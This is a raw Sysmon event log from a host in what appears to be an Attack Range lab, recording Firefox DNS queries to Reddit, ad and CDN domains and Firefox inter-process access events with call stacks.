22542200x800000000000000017754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.922{59A5CD1D-945A-6005-3305-00000000A301}7052gateway.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.785{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.785{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.675{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.566{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.566{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.566{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.566{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.519{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.519{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.519{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.519{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.519{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.457{59A5CD1D-945A-6005-3305-00000000A301}7052reddit-d.openx.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.440{59A5CD1D-945A-6005-3305-00000000A301}7052status.geotrust.com0type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.428{59A5CD1D-945A-6005-3305-00000000A301}7052e13136.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.425{59A5CD1D-945A-6005-3305-00000000A301}7052e13136.g.akamaiedge.net0104.79.89.133;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.424{59A5CD1D-945A-6005-3305-00000000A301}7052reddit-d.openx.net035.244.159.8;34.98.64.218;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.423{59A5CD1D-945A-6005-3305-00000000A301}7052z.moatads.com0type: 5 wildcard.moatads.com.edgekey.net;type: 5 e13136.g.akamaiedge.net;::ffff:104.79.89.133;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:33.847{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:33.847{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.053{59A5CD1D-945A-6005-3305-00000000A301}7052partner.googleadservices.com0type: 5 partnerad.l.doubleclick.net;::ffff:142.250.74.194;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.053{59A5CD1D-8E56-6005-2E00-00000000A301}2464218.64.98.34.in-addr.arpa.0type: 12 218.64.98.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000017790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.053{59A5CD1D-8E56-6005-2E00-00000000A301}2464133.89.79.104.in-addr.arpa.0type: 12 a104-79-89-133.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.053{59A5CD1D-8E56-6005-2E00-00000000A301}2464161.212.58.216.in-addr.arpa.0type: 12 ams15s22-in-f1.1e100.net;type: 12 fra24s01-in-f1.1e100.net;type: 12 ams15s22-in-f161.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.053{59A5CD1D-8E56-6005-2E00-00000000A301}246465.207.58.216.in-addr.arpa.0type: 12 fra16s25-in-f1.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000017805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.363{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.363{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.363{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.201{59A5CD1D-945A-6005-3305-00000000A301}7052da397d706f8a732ae3e55e4f8d8d18c4.safeframe.googlesyndication.com0type: 5 pagead-googlehosted.l.google.com;::ffff:216.58.207.65;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.751{59A5CD1D-945A-6005-3305-00000000A301}7052eu-u.openx.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.750{59A5CD1D-945A-6005-3305-00000000A301}7052eu-u.openx.net035.244.159.8;34.98.64.218;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.749{59A5CD1D-945A-6005-3305-00000000A301}7052eu-u.openx.net0::ffff:34.98.64.218;::ffff:35.244.159.8;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 